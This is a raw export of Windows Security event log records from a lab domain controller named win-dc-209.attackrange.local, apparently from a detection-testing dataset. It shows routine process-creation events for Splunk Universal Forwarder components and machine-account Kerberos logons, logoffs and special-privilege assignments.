ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265076
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x280
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265078
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b6c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265077
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265079
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265080
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1998
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265082
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265081
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13b8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:55:38 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265083
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8AF444
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265086
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B62AC
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265085
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B62AC
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64958
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:55:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265084
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B62AC
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:56:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265087
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x182c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265089
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1990
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265088
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b1c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265090
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a5c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265091
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1550
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265093
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265092
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1778
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265096
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B9B2F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265095
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8B9B2F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 64971
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:56:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265094
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8B9B2F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:57:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265097
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1bb8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:57:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265099
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x13e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
